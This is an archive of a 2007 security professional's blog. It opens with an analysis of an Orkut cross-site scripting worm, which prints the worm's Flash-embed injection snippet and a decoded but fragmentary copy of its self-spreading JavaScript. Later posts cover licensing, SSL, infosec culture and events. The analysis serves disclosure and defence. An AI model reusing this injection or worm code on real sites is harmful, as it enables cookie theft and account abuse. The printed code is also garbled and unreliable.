Wednesday, December 19, 2007

More on Orkut worm

Yes, my HTML/Javascript-fu is weak. So much so that I didn't know we were dealing with pure Javascript. Javascript that just happens to exist to facilitate posting Flash movies and games, so that's why it has "Flash" written all over it.

To back up several steps... I received an email from Orkut saying that someone I know had left me a scrapbook entry. I went and looked at it, and was puzzling over the non-Englishness of it from someone whom I know is an English speaker. Of course during that time my browser (Firefox on OS X) was busy doing the same to my Orkut contacts. Sorry about that guys!

One of them is Jeremy Rauch. Within minutes of me looking at my scrapbook, I get email that Jeremy and others have now left me new scrapbook entries. This is about when I start to guess what's going on. I mail Jeremy to point out that he seems to have it now, and he says he knows... I gave it to him. Whoops! Jeremy was skeptical that Flash was really involved, since he has it blocked in his browser by default. He was right.

So here is what I think is happening, to the best of my ability as someone with weak Javascript-fu. Take a look at the chunk of HTML that ends up as a scrapbook entry that I posted earlier.

It obviously pulls in a chunk of Javascript that is even named "virus.js". But why all the trickery with the Shockwave and flash stuff? If Orkut allows posting raw HTML, why the games? Why not just source virus.js and be done with it?

So I did some experiments tonight. I tried the old script, alert 'hello I'm an XSS', etc... and that doesn't work. It says my rich content was rejected, see here.

And yet, I can paste in a much more complicated embed a flash movie expression, and that DOES work. Though, it made me fill in a CAPTCHA. I suspect that CAPTCHA is brand new as of tonight, otherwise I'm not seeing how the worm worked so well.

So the basic security challenge for Orkut here is that they want to allow some arbitrary HTML, but not others. As we have seen for many years with web-based email, that's a pretty hard problem to solve.

So that's why the hoops to jump through. The worm author needed something that looked like a flash movie so that Orkut would allow posting it, but in fact allowed him to pull in arbitrary Javascript.

This is where the SWFObject library comes into play. Its purpose in life seems to be to make it easier to embed Flash stuff and have it play properly. Orkut is nice enough to make this library available to every browser that loads the Scrapbook (and probably other) pages. They keep it at, which they source for you.

It looks to me like the worm author is able to build a SWFObject that includes the Javascript and causes it to be embedded in the Orkut page, thereby acting in the right context to have access to your Orkut cookies and all the good stuff that an AJAX worm needs. MySpace isn't alone in having all the good Web 2.0 worms anymore.

Jeremy decoded and prettied up the obfuscated Javascript. You can see that code at the end. If you're watching carefully, you'll see this version has a different message as the scrap body than the one I originally posted. That means the person (presumably the worm author) who controls the virus.js download page has revved the file at least one. I have two different (obfuscated) versions. Since I believe Orkut was taking active measures to shut this thing down, I'm guessing the author changes the text in case Orkut was keying off that.

Like I mentioned before, if the CAPTCHA is new, that should essentially stop this thing from spreading. This kind of worm has interesting implications for social sites. If this gets to be really common, it means you'll be answering CAPTCHAs or something similar left and right.

Also worth noting is that stopping the worm doesn't stop other interesting attacks. I was still able to post the same embed chunk of code to my own scrapbook as an experiment, I just had to answer the CAPTCHA. So a human could still put something there. If they can use it to run Javascript, that still leaves open attacks where they can steal your cookies.

It looks like the immediate problem is over. I probably won't have a lot more technical to say on this one. I hope that the Jeremiahs and RSnakes of the world will jump in soon and tell me how the worm actually works.

Decoded Javascript:

var index=0;
var SIG=JSHDF["Page.signature.raw"];

function createXMLHttpRequest(){
try {
return new
} ;

try {
return new ActiveXObject("Microsoft.XMLHTTP")

try {
return new XMLHttpRequest()
} ;
return null

function setCookie(name,value,expires,path,domain,secure){
var curCookie=name+"="+escape(value)+(expires?";expires="+expires.toGMTString():"")+(path?";path="+path:"")+(domain?";domain="+domain:"")+(secure?";secure":"");

function getCookie(name){
var dc=document.cookie;
var prefix=name+"=";
var begin=dc.indexOf(";"+prefix);
return false
} else {
var end=document.cookie.indexOf(";",begin);

return unescape(dc.substring(begin+prefix.length,end))

function deleteCookie(name,path,domain){
if(getCookie(name)){ document.cookie=name+"="+(path?";path="+path:"")+(domain?";domain="+domain:"")+";expires=Thu, 01-Jan-70 00:00:01 GMT";

function loadFriends(){
var xml=createXMLHttpRequest();
var xmlr=xml.responseText;
var div=document.createElement("div");
var select=div.getElementsByTagName("select").item(0);
} else {

function cmm_join(){
var send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.join";
var xml=createXMLHttpRequest();'POST',''+String.fromCharCode(52,52,48,48,49,56,49,56),true);

function sendScrap(){
var scrapText="Boas festas de final de ano![silver]"+new Date().getTime()+"[/silver] ";
var send="Action.submit=1&POST_TOKEN="+encodeURIComponent(POST)+"&scrapText="+encodeURIComponent(scrapText)+"&signature="+encodeURIComponent(SIG)+"&toUserId="+document.getElementById("selectedList").item(index).value;

var xml=createXMLHttpRequest();"POST","",true);
var wDate=new Date;

var wDate=new Date;


Tuesday, December 18, 2007

Orkut "virus"

More of a worm, actually.

I had an email from Orkut this evening telling me I had a new scrapbook entry. I don't really use Orkut, but I signed up a while back, and friended a bunch of people I know. The scrapbook entry was a bit cryptic:
2008 vem ai... que ele comece mto bem para vc

I still don't know exactly what it means, I'm assuming it's Portuguese. Babelfish wasn't any help. I won't mention who I got it from, but I will admit that if you are friended by me on Orkut, I probably gave you a copy too. Fortunately, it looks like Orkut is actively and quickly deleting them, to stop the spread. I say completely unsarcastically, good job Orkut on the quick response!

I haven't done any kind of through analysis yet, but it looks like a Javascript worm that kicks in via a Flash XSS? My HTML/Javascript/Flash-fu is pretty darn weak. This is what it looked like:

<div id="flashDiv295378627"><embed type="application/x-shockwave-flash" src="Scrapbook_files/LoL.html" style="" id="295378627" name="295378627" bgcolor="#FFFFFF" quality="autohigh" wmode="transparent" allownetworking="internal" allowscriptaccess="never" height="1" width="1"></embed></div><script type="text/javascript"> var flashWriter = new _SWFObject('', '295378627', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '295378627'); flashWriter._addParam('wmode', 'transparent'); script=document.createElement('script');script.src='';document.getElementsByTagName('head')[0].appendChild(script);escape(''); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv295378627');</script>

Looks like it joins you to an Orkut group, too:

Infectados pelo VĂ­rus do Orkut.

Owner of the group is a new-looking account named "Virus do Orkut". Also, listed at the end of the virus.js file is this: author="Rodrigo Lacerda"

Tuesday, October 30, 2007

Comment spammers

The comment spammers have finally found me. I have tried deleting the comments manually, but they just post a couple more every day. I've turned on CAPTCHAs, we'll see how that works. I'm loath to put any barriers in for people wanting to comment, so sorry about that.

Tuesday, July 31, 2007

Off to vegas 2007

I'm on my way to Las Vegas for Black Hat & Defcon. For Black Hat, it looks like I'm doing a booksigning on Wednesday at 4:30. BigFix is hosting the Gala at 6:00 on Wednesday as well, so I will be putting in an appearance. Please come say hi if you're around. I will also be at Defcon, but good luck spotting me in the crowd there if you don't already know what I look like.

I look forward to catching up with friends I only get to see at cons.

Thursday, July 19, 2007

The Ladies of Infosec

I was at an event not long ago, and the woman in the group was really pissed. In a room full of nothing but security geeks, someone asked her "Oh, do you do security work?"

This didn't happen with any of the guys. The question they got was "Where do you work?"

I was thinking about this today, and I realized that every woman I know who works in infosec has told me a similar story. That might be a slight exaggeration, but not much. Literally every one I can think of right now has told me one of these stories.

They get things like:
  • Are you here with your boyfriend?
  • She used to be a man
  • Take your shirt off
Yes, sadly I have heard jerks yell out "take your shirt off" when a woman was trying to give a talk.

How much do women hate this? You can read what Raven thinks about it.

Let me tell you a little about this particular woman in question that reminded me of all this. She has worked in some of the most important software companies in the world, in the security groups. She has worked at at least two security companies that I know of. Pick just about any well-know security male, and they know who she is and they respect her work.

If you've been paying attention to the infosec world, you probably know who I'm talking about. Keep it to yourself, because this particular woman is not the point.

I have met a number of women at various conferences. I'd look really foolish if I went around assuming they weren't attendees or didn't know what they were doing. I've met a woman who works for the CIA. I've met one who was a heavy-duty cryptographer. I've met one who does BGP vulnerability research. Yes, the women are rare. Staring and asking stupid questions doesn't help improve that.

Because of how hostile the infosec world is to women, the ones who manage to survive tend to really love what they do, and have worked very hard to stay in the field. This may mean that the woman you just met is better at security than 90% of the men. That probably includes you (and I'll happily concede that includes me.)

Keep that in mind.

Wednesday, July 18, 2007

BaySec 3 Tonight!

BaySec 3 is tonight, July 18 2007.

Per Nate:
July 18th, 7-11 pm or so.
O'Neills Irish Pub
747 3rd St (at King)

Tuesday, July 17, 2007

The BigFix logo

I promised to keep my work blogging on the the work blog, unless I thought I had been particularly clever. I think this one qualifies.

Wednesday, June 20, 2007

BaySec 2

BaySec 2 is tonight, June 20 2007.

Details here.

Hope to see you there!

Wednesday, June 06, 2007

Attention Jed Pickel

It appears that I owe you a big apology. You were right, I was wrong.

(It's amazing the stuff you find when googling yourself.)

Monday, June 04, 2007

Open Source Remorse

So rather than continuing to carry on in the Matasano blog comments (1, 2) and being mirrored in Alan's blog, I figure I should gather my thoughts on this subject in my own long-winded blog entry.

Now, my recent comments have been prompted by Alan's and Tom's comments at each-other, but they aren't about that per se. I gather the background there is that StillSecure has released Cobia which includes Snort (and other open-source bits?), but the Cobia bits aren't GPL. I really don't know anything about whether there's any inappropriate linking or anything going on, I haven't looked at it. The StillSecure guys raise some legal doubts about the GPL, and Tom points to Marty's post about the "clarifications" in the Snort license.

(Update: Alan tells me that Cobia does NOT include Snort. Leaving me wondering what Tom was was upset about in the first place. Shrug. Sorry about further muddying things with my incorrect claim, Alan.)

The key point that Tom raises that I want to take issue with is this:
Why do I care? Because companies like StillSecure are driving open-source projects “underground”, into proprietary licenses. Wow, that sucks.
Now, let's hang on a second there. It looks more to me like a basic desire to make money has caused the open-source security tools developers to start changing their licenses.

They have open source remorse.

It looks more to me like they are finding it difficult to get people to pay them when their stuff is licensed only under a GPL license. Obviously, if the software is only available under the GPL, then anything else it goes into also needs to be GPL. (Modulo calling vs. linking vs. straight source modification, etc... I'm not here to try to hash that mess out.)

I've watched this happen with BitTorrent, Nessus, nmap, and Snort.

Is there anything wrong with making money with software? Certainly not. I've worked at Sybase, contracted at ArcSight, tried my own hand with Enforcer for AnchorIS, and am currently about 4 years in at BigFix. BigFix, by the way, has licensed nmap for commercial use, and Fyodor's licensing terms were very reasonable. All those companies I worked at are traditional, closed-source software vendors. So I fully stand behind profiting from software licensing.

We are salesmen, and completely up-front about that.

But I believe there is a different standard if you're going to go the open-source route. Maybe I'm too much of an idealist, but then, the GPL is kind of an idealist license.

So here's the game: You create some very early, proof-of-concept open-source security tool. Maybe you're early to the market, or maybe you have some genuinely nifty feature, but you're a known concept, an IDS or a scanner.

How do you gain popularity? Well frankly, being free can be a huge help. And if you're not doing it for a living anyway, it works for everyone. What do most open-source projects want? Help. For the packages I've mentioned, they got it

Maybe it wasn't in the form of (much) code. But it was in the form of signatures, QA, people running mailing lists, people submitting fingerprints and banners for obscure software, filing bug reports and feature requests, help compiling on weird unixes, packet captures, books, articles, and other general evangelism. The license also allows every Linux distro in the world to ship your stuff, further cementing you as a de-facto standard.

Those things are absolutely massive contributions for a young project. I don't wish to discount the efforts of the key developers on each of those projects. The packages would most certainly have fallen into obscurity without their leadership. But even then, you don't maintain such a project for years without a positive feedback loop.

But for the projects mentioned, the maintainers eventually decided they would like to make a living off the project.

This is where I admit that I don't know what's in the hearts and minds of the people who are now selling commercial licenses for these projects. I can only judge based on their actions and published licenses.

But it sure looks like they're taking the combination of their own work and the community support, and selling it for a profit.

Why do I care? Because I believe that a lot of people, myself included, gave support because they thought they were helping out a project that was only under a GPL license. Changing it after the fact strikes me as a kind of dishonesty. If you help out a commercial software company, great. You knew what you were helping. I know a lot of people who do free QA for Microsoft.

But if you think you're contributing to a project because your help will always be available to the world, and you'll find it in your favorite latest Linux distro, sorry. Nessus is all the way there, no new Nessus for anyone who doesn't want to register, download and install it themselves, and so on. And no source. Snort and nmap can still be shipped around, but we'll see if it stays that way. No more free Snort sig feeds for you though, if I recall correctly.

I should clarify a point. I keep talking like these projects aren't GPL anymore. That's because I don't think they are, at least not entirely. Nessus clearly isn't anymore. No question there. How about Snort and nmap which have commercial versions available for licensing?

Marty asks in the Matasano blog comments next to me "Snort isn't GPL?"


So you can take Snort and code on it or mix it with other code, and your users can demand the source from you under the GPL terms. That seems pretty GPL, right? So what if your code is in Snort, and SourceFire sells a license to a commercial software vendor. Can you make that vendor give you a copy of their source?


Anyone remember the point of the GPL? It's so that no one can take your code away from you.

So you might be wondering, how can they take your GPL code and sell it under another license? Am I accusing these projects of stealing code? No, not really. I assume that they have acquired the rights to all the bits of code or have purged the stuff they can't track down.

Yes, this does mean they had to have planned this for a while. They had to stop taking contributions from all the outsiders or people who will only submit GPL code. I believe these guys are smart enough to get this right, though I wouldn't mind seeing how they went about auditing the codebase.

Does this mean they can never take outside code again? Well, it means the submitter has to be willing to give them a license to do whatever they want with it, including selling it non-GPL'd. This would include, say, people working on it for the Google Summer of Code.

SourceFire has that part tied up rather neatly, too. If you read Marty's "clarifications", you'll see that if you get your code near any SourceFire people, then you automagically grant them the right to sell it as closed-source.

So no, not GPL.

Another interesting thing about the GPL, it only covers code and maybe some docs. If you made some other kind of contribution like the ones I mentioned earlier, not covered. They can just take it and sell it.

So who is really killing GPL'd projects? If you think StillSecure is stealing without giving back, I'm not seeing how SourceFire isn't doing some of the same.

I've met Fyodor and a bunch of the SourceFire guys a number of times. I don't have anything against them personally, and it's not like I don't wish them financial success. I just wish they had either had the license they really wanted in the first place, or didn't go changing it late in the game.

Saturday, June 02, 2007

That's your manifesto?

Pete Lindstrom posts his Secure Software Manifesto. Pete, you'll have to do better than that. I guess a manifesto is not a thesis, it's not intended to be a self-contained set of assertions and evidence. But I feel it necessary to call out what look like some glaring factual errors and inconsistencies to me.

1. Public vulnerability information (e.g. CVE, disclosure info, etc.) provides data about the activities of the hacker/bugfinder/security researcher community; it tells us nothing about the absolute or relative level of vulnerability of software.
On the contrary, I think the effort required to find bugs, and the rate and volume at which they are discovered are the best indicators of the relative level of security of a software package. I will agree that this doesn't tell us the absolute number of vulnerabilities left. There's always the chance that the researchers found the absolutely last bug in a package on the 31st while doing their Month of x Bugs.

The past is not necessarily a predictor of the future, but the past may be a predictor of the more recent past. Or you might prefer correlator. I believe the data is all there for someone who wants to, say, take the bugs for packages from 2005 and see how they correlated with bugs in 2006. At least for known bugs.
2. The defining aspect of a software program's vulnerable state is the number of vulnerabilities (known or unknown) that exist in the software. It is not how hard programmers try not to program vulnerabilities nor how hard others try to find the vulnerabilities.
The first sentence is a fine definition. The second sentence seems to be trying to distance itself from the first, though. If you try hard to create fewer vulnerabilities (and have some talent and experience in that), don't you think you will create fewer vulnerabilities? And if you missed some, and other find them and you fix them, don't you mostly end up with fewer vulnerabilities?

So no, using the definition of "vulnerable" to mean there is at least one vulnerability left, there's probably no amount of effort you can expend that is going to get that count to zero. But don't we want software packages that have fewer vulnerabilities, if you can't have zero?

Because if there's no value to that, I know lots of people who could be doing something else with their time.
3. The contribution of a patch to the vulnerable state of a software program is a tradeoff between the specific vulnerability (or set of vulnerabilities) it fixes and the potential new vulnerabilities it introduces.
Sure. Do you mean to imply that patches often introduce new problems? I'm kinda under the impression that's relatively uncommon, but I'd be willing to be proven wrong.
4. There is currently no known measurement that determines or predicts the vulnerable state of a software program.
False. If you use the definition of "vulnerable" meaning that there is at least one vulnerability, then I have a program that will read any other program of some minimum complexity, and return the probability that it is vulnerable. The answer is usually 1. I'm very confident in my low false-positive rate.

Facetiousness aside, I agree that there is no metric or program to find or event count all of the vulnerabilities in a program. Maybe not even most of them.

But there are programs, services and consulting that will find "some". Is there value in finding "some"? Is it useful to know how hard it was to find "some"?
5. We don't know how many "undercover" vulnerabilities are possessed and/or in use by the bad guys, therefore we must develop solutions that don't rely on known vulnerabilities for protection.
Once again, I agree with your opening statement, and am left wonder where you got that particular conclusion. Why not "therefore we must find and fix as many vulnerabilities as possible" or "therefore we must infiltrate the underground and gather intelligence"?
6. The single best thing any developer can do today to assist in protecting a software program is to systematically, comprehensively describe how the software is intended to operate in machine (and preferably human) readable language.
As a QA guy, I'd have to say that would be really, really awesome. Yes, can I have that please? But if I had that, isn't that the same as programmers trying hard, ala your point 2?

Wednesday, May 16, 2007

BaySec 1 Tonight!

BaySec is this evening. Hope to see you there!

Also, there is now a CitySec site for organizing these things. I know it's unlikely that you're aware of or care about the city meetups are are not reading the Matasano blog and don't know this already. But for completness' sake, and search engines and so on.

Saturday, May 05, 2007


The first San Francisco-area Matasano-inspired BaySec get together is Wednesday May 16 2007, 7:00 PM at Zeitgeist. They tell me they don't do reservations, and the best thing is to show up early and stake out your seats. Sounds like an invitation to take over the place to me.

Likely attendees (aka those of us who have been conspiring to get BaySec started) are Raffael Marty, Anton Chuvakin, Nate Lawson, and more importantly, you.

There's a mailing list, courtesy of Tom Ptacek:
baysec at sockpuppet dot org
baysec-subscribe at sockpuppet dot org

Hope to see you there, and please spread the word.

Tuesday, April 03, 2007

Why SSL sucks

Recent posts about security protocols like SSL and DNSSEC got me thinking. In an orthogonal direction.

You know what's wrong with protocols like SSL, SSH and PGP/GPG? They let users pick the stupid. Bruce Schneier has trained me to call this the "dancing pigs" problem, though I'm too lazy to go look up the guy Bruce says he got it from.

It goes like this: "There's a problem with the security gizmo; click OK to see the dancing pigs."

Unless you're a security researcher who lives for the chance to investigate a malicious server, you just click OK to see the dancing pigs.

All my kids have been computer users since before they could read. They don't know what the dialog says, but they learn to click OK to see the dancing pigs. Even when they do learn how to read, they aren't necessarily so concerned with expired certificates or DNS name mismatches.

The reason these protocols all suck is because they let just anybody make the security policy decisions. Stupid.

(OK, so it's not the protocols/file formats themselves, just every app that implements them.)

So, what am I suggesting instead?

Dan Kaminsky wrote an excellent chapter on spoofing for me, for the first edition of Hack Proofing your Network. I hope to have it available for download one of these days. In it, he makes a perfect case for reliability == security. If your service is going down all the time, then you are being trained to live with unreliability and ignore strange problems. Your judgment is shot.

So much for the idea that a DoS isn't a security problem.

As a QA guy, I really want bugs to crash, and crash hard. Crash dump or core file too, please. The alternative is random behavior, unreproducible issues, caught exceptions that I really needed to know about, and maybe memory scribbling that could exhibit random symptoms. You don't want it to be kinda tolerable, not that big of a deal, I haven't seen it in a while I guess it's gone kind of a problem.

So security protocols need to break and break hard.

If there's a problem with the certificate, then just drop the connection. Don't prompt the user. Don't try to rate how bad of a problem it is. Don't toss a yield sign in the corner, don't show me a key with fewer teeth. Just stop.

If the SSH server keys have changed, don't connect. Don't offer to connect anyway. Don't ask if I want to save over my keys. Don't tell me the command-line switch to disable my security.

If the GPG email signature doesn't verify, don't let me read it anyway. Don't invite me to keep searching keyservers until I happen to find one with keys that agree.

Why? Because if it breaks properly, people will be forced to get someone competent to fix it. And they will HAVE to fix it.

Examples. If someone's SSL cert expires, right now they can sort of ignore it for a little while, or tell people to click OK, and so on. Do it my way, and it breaks entirely, and the person who should have renewed the cert does so, right now. Don't get me started on self-signed certs. If you've done something and blown away your server SSH keys, you think no big deal, just tell everyone to accept the new ones. Do this enough, and what have you trained users to do? If instead SSH doesn't work at all, how much more careful would you be about bothering to restore the original SSH keys?

But this is painful for people? That's the point. People learn through pain. Some things should be punished. Some events should be disruptive.

People should be trained to take security seriously.

Tuesday, March 27, 2007

I'm glad you got your kid back

Erik takes his kids to Disneyland, but manages to lose the 3-year-old. But that's OK, he had hung a USB flash drive around the kid's neck, and had him back within 13 minutes.
Our three year old did just what we thought he would do - Disappeared. Within 13 minutes of being ‘lost’ though, my cellphone rang.
The little scamp.

Anyway, I actually am glad he got his kid back so quickly. Nothing is worse than having your young child go missing. But...

So the father planned ahead, that's good. If you'd like to do the same yourself, I see that SurplusComputers has a 2-pack of similar-sounding drives for about $8.

But I can't say I recommend you do that. Instead, I recommend that you plant the equivalent of a dog tag on your kid. It's no worse than the USB version, and you're much more likely to get someone with a cell phone and no computer handy to just read the tag and call you.

Heck, if you know you're probably going to lose your kid at Disneyland, I bet you could get them back in just 5 minutes with the dog tag.

Oh, and I see the lost USB drive thing just relies on Autorun to pop up the message. Disneyland Security, you just got pwned by a 3-year-old. Pentesters, are you paying attention?

Found via The Disney Blog.

Saturday, March 24, 2007

Owning up

If you're a software vendor and a researcher comes along a claims there's a problem with one of your offerings, and you (the vendor) think there is not, you issue a public statement to the contrary. That's fair.

However, if the researcher persists and manages to prove his or her case to you, what do you do?

If you're Microsoft, you own up to the problem, and thank the researcher for making you understand.

Exhibit 1
Exhibit 2

That sure looks like the right way to do things to me. At least, the drama will probably only last about a week.

Monday, March 12, 2007


Great short blog entry By Larry Osterman about FPO. I certainly have seen any number of functions that work both ways, but I never knew it had a name, and I hadn't picked up the implication for debugger stack traces.

Thursday, March 08, 2007

Official shilling

My employer BigFix has launched a company blog. I have written my first entry responding to a post on Ross Brown's blog.

Anything that's strictly a BigFix topic, I'll probably do over there from now on. Though, if I think I've been especially clever or something I may drop a pointer here as well. I can think of at least one thing coming up in the future that will be posted over there that I will probably want to share. It's a follow-up of sorts to my previous Rubik-related post.

Thursday, February 22, 2007

Julie Amero add'l

Brian Livingston gave me permission to write my Windows Secrets article this time about Julie Amero. I'm grateful that he allowed to use my space there (which is a paid gig for me) to help spread the word. Brian is sympathetic to her situation as well, and you may have seen him quoted in the New York Times story about it. In addition, he made it the Top Story, which means that it goes to ALL subscribers, not just paid subscribers. It also means I can link to it from anywhere, like I just did.

If you don't know about Julie's situation, you can read my article, and there are some links in it to others that give more background. If you read security blogs at all, you probably already know all this, so I won't cover it here. The reason I haven't mentioned it before is because I was preparing that article, and because I have been working behind the scenes with others, as hinted at in the article.

I can be long-winded, so my article was over twice the length it was supposed to be, and had to be cut down a bit for the newsletter. I wanted to use the extra material here, and make an update or two.

In the ComputerCOP Pro section, I originally had this:

So what did the detective use to examine the "image"? He used a program called Computer COP Pro. Here's an example entry from the FAQ:
Q. Does Professional require training to use?

A. For a competent computer user, Professional truly does not need training to use as the detailed search applications are performed automatically by the software and the product does come with a Getting Started manual. However, because you may need to testify in court or in a hearing, it would be best to receive the company's training and certification.
So, training would be nice, but you can get away with not doing it if it's inconvenient. I'm told that training consists of an hour on the phone.

Needless to say, this program really doesn't sound like it would meet my standards for a forensics utility.


Since this is a key portion of the prosecution's case, Alex Shipp contacted a representative from the makers of ComputerCOP about this aspect of their software. Alex tells me:
Allison Whitney, directory of communications for ComputerCOP, confirmed that the product was unable to distinguish between URLs visited as a result of malicious software, and URLs visited by direct user action.

She also confirmed that this point is not made clear during the ComputerCOP training. At this point in time, ComputerCOP have no plans to contact the Connecticut court to point out the errors in interpretation of the ComputerCOP output made by the prosecution attorney and prosecution expert witness.

Why didn't the defense present these kinds of findings? They tried. There appears to have been a procedural error on the defense's part, and the judge would not allow the defense to enter their evidence. The defense expert has publicly stated that his analysis of the computer files would have revealed that spyware was causing the pop-ups to appear and he feels the evidence would have totally exonerated Julie.

[end of extra material]

Speaking of procedural errors on the defense attorney's part, it appears that Julie is getting a new lawyer, and this may delay sentencing. This is good news. The article makes the new lawyer out to be a hot shot, which is exactly what Julie needs. Despite the fact that she has been declared guilty already, there are a couple of small chances for the case to be resolved before sentencing still, from what I understand. The prosecution could realize that there has been an error in the facts presented, and request that the verdict be vacated, for example. I'm obviously not a lawyer, so apologies if I have abused the terminology.

Despite the TV shows you see, I'm learning that appeals aren't as easy to get as you would think, so anything that helps slow this train wreck down and bring some sanity into the situation is a welcome development.

Saturday, February 10, 2007

Apple vs. Maynor update

I had a great time chatting with people at the security bloggers meetup the other night. There were any number of "I didn't know you blogged" moments all around. Two of the guys I spent some time talking with were David Maynor and Robert Graham who have recently formed Errata Security. And yes! they are blogging too.

We chatted about all kinds of things. We chatted about Robert moving on after IBM acquired ISS. It seems that David found some reason to move on from his position at Secureworks, too. And then we went to dinner at some mediterranian tapas food place, and chatted some more. They bought. Thanks for the dinner, guys!

So when I got back home, I tracked down their blog, and there's some good stuff there. Hey look, there's this one particular entry from David. Looks like he's tired of keeping his mouth shut about the Mac wireless hack thing. Short version of my take on the issue: I believe David and Johnny.

But at this point, I do have to agree that some opportunities have been lost. The Matasano guys propose some hoops that researchers should be going through. Frankly, I thought that was a little silly and totally unnecessary. Even in David's case. I never thought for a second that Apple would ship the patch while still claiming that David and Johnny found nothing. I was wrong on both counts.

So unfortunately, this leaves room for the next bit of stupidity. If/when David ever decides to demo owning the built-in wireless, or release an exploit, etc... then the Mac zealots will claim that he must have reverse-engineered the Apple patch, and that he never found anything ahead of time.

Because David can reverse engineer the patch and write a working exploit, but he's not capable of finding the hole in the first place, right? And the hole that Apple fixed just coincidentally is in the area that the original Black Hat talk covered. And the holes in other OSes that they found of the same class aren't related. And HD Moore using their fuzzer and finding a similar hole in OS X has nothing to do with it.

One of these days, I hope David drops more info. At this point though, it looks like Apple has been largely successful. They have managed to drag things out long enough and tell enough half-truths that their customers believe Apple. So it's likely that few zealots will be swayed when David finally presents proof. There will just be further dismissals from people who really don't understand security very well. I still look forward to it, though.

Hey look, David is speaking a couple of times at Black Hat Federal later this month.

I'm in ur package, playing with ur puzzlez

So one of the developers I work with, Dave, is quite the twisty-puzzle fanatic. Take a look at some of his photos on flickr, and you'll see what I mean. Here's something like 1/3 to 1/2 of what he has in his office at work:

As you might imagine, Dave is also on all the various puzzle sites, and knows which puzzles are rare, which are worth the most, and which ones he doesn't have. Recently, he worked out a trade with some other puzzle collector in another country. He shipped a Square-1 in exchange for a few other puzzles. This is what arrived in the mail:

Yes, go ahead and look at the larger version of that pic. That's the Department of Homeland Security logo. So what was inside that caused such alarm that they had to open his package in transit to inspect it?

We suspect it was the rare and unusual Rubik's Hat that caught their attention. Had it been your run-of-the-mill 3x3, I doubt they would have felt it necessary to play with it. or maybe they saw The Da Vinci Code recently, and it looked like a cryptex on the x-ray?

Rubik-sniffing dogs?

Dave did note that whoever was fondling his hat didn't seem to have any luck solving it. Good thing he didn't trade for something with batteries and wires.

Update: As if to further prove his cube-geekiness (did I mention that he placed fairly well at the recent cube-solving time trials?) Dave writes:

Nice, although technically it was my custom modified Square-1 that I traded, as a vanilla Square-1 is only worth $20-$30. I hear that the maker may even be doing another round of production, in which case the price might go back down to $9.99 or so. Here's a flickr picture of my custom modification:
I stand corrected.

Thursday, February 08, 2007


Alright, I admit this has nothing to do with my usual blogging topics. Maybe because I snapped it while leaving the hall at RSA to head to the security bloggers party?


Hey, at least that's not quite as bad as ninjas killing your family.

I paid the gentleman a dollar for the privilege of taking his photo. I found him on 4th street between Howard and Mission, around 6pm. I have no idea what his usual working hours are, or how often he rotates his signs.

Second best ad at RSA

I hereby declare the second-best ad at RSA:


"Beware of False Positives"


(I give "best" to my company's own ad, of course. It holds special place in my heart. However, if you think this one is first place, and ours only second, I'll forgive you.)

The woman working the booth tells me that it was "obtained" in Seattle, and is authentic. They were raffling it off in their booth. Excellent job CyberDefender.

Wednesday, February 07, 2007

I'm shillin' like a villain

I just had a great time at the security bloggers thing. I was a little surprised that not only a number of them read my blog, but given that, they don't realize I work for BigFix. Speaking of vendor bias, I will now attempt to provide a good clear example.

We have been trying some new ad campaigns lately. First, there are the Software Truth viral videos. I think they're worth a chuckle. We've gotten some good feedback, and people seem to like them. So far, the only complaint has been from one blogger who seems to have been fooled into thinking they were some sort of real senate hearing. But I think that reflects more on that particular blogger than it does on our videos.

And then the last couple weeks at work, I see this ad taped to the door of our CEO's office. I assumed it was an internal joke thing, and that we would not go there.

Apparently, we would. We are on the playground talking smack, and our competitors should consider it to have officially been brought.

Check out this ad (~1MB .pdf). I'm told that this ran nice and large in the Northern California edition of the Wall Street Journal today. And you should expect to see it in a number of magazines Real Soon Now. Should you enjoy it as much as I do, you can go to our site and sign up for a demo of our stuff, and get a poster version of it. (If you don't want to grab the PDF, that link also shows the picture and text, so you'll get the idea.)

Yes, those are McAfee, Symantec, altiris, and Landesk we are ramming our sword through.

Generally speaking, I'm not big on cheerleading for my employer. I try to be careful about plugging my company's stuff out of context. If I'm writing a book or an article, a mention in my bio is usually sufficient. If I'm speaking, the line on the first page of the slide deck is usually good enough, even though they probably paid for my travel. And when I'm overtly pointing out something we're doing, I try to make it abundantly clear that I'm an employee, and that I'm in sell mode.

But when my employer does something above and beyond, and I really approve of it, I'm willing to occasionally give props like this. I think an ad campaign like this takes balls of a certain minimum diameter, and I'm glad to see we've got 'em.

The cynics (and maybe competitors) among you might look at an ad like this, think to yourself that you haven't heard much about BigFix before, and conclude that this is a desperate cry for attention from a struggling company. And frankly, if I weren't on the inside seeing what we are doing, I might agree with you, and cringe when I saw us doing this.

But the fact is, we are growing big time. We are replacing our competition all the time, and beat them regularly in customer evaluations. Despite the fact that these guys pay me, and I'm talking about the software that I QA every day, I'm still sincerely impressed with it. It actually works.

We do not come in peace.

Saturday, February 03, 2007

Old skool security

While researching things for the Oldest Vulnerability Contest, I ran across a number of references to "Computer abuse perpetrators and vulnerabilities of computer systems" 1975, by Donn B. Parker. I did find it listed on Amazon, unknown binding, ASIN B0006WFZ9I. I left in on pre-order for a good year or so, but no one was ever selling one.

Mr. Parker appears to have written a number of security books and reports in the 70's and 80's, mostly while working at SRI. You can find most of his published books easily enough, but not what I'm looking for. I'm guessing it's not a regular book.

I can see that he left a collection to The Charles Babbage Institute at UMN that includes it. I'm going to check there about getting a copy. He seems to have granted some copyrights to CBI, so that might work out.

Also, anyone know if Donn Parker is still alive, and if so, how to reach him? I'd love to do an interview with him. I see references to him doing things in the early 2000's, so he can't have been gone long, if he is.

Amazon Links

I'm trying to see what Amazon links look like now. I've had an Amazon affiliate account for years, but I have barely ever used it. I used to just throw my associate ID ("thievco") onto links, but it looks like that changed probably around 2004. Amazon sent me a quarterly report email the other day, so I thought I would look into it. I plan to mention books frequently, and I'm not at all above throwing on my associate ID. But I wanted to see how it was going to look.

Here's one for my latest book, which is now in print and in stock:

Let's see how that looks. I may twiddle this post, apologies if it shows up in a feed multiple times. Of course, this is all javascripty, so if you're reading this in an RSS reader, you probably don't see it at all. Don't worry, I'll do a proper post in the near future where I shill my latest book the right way.

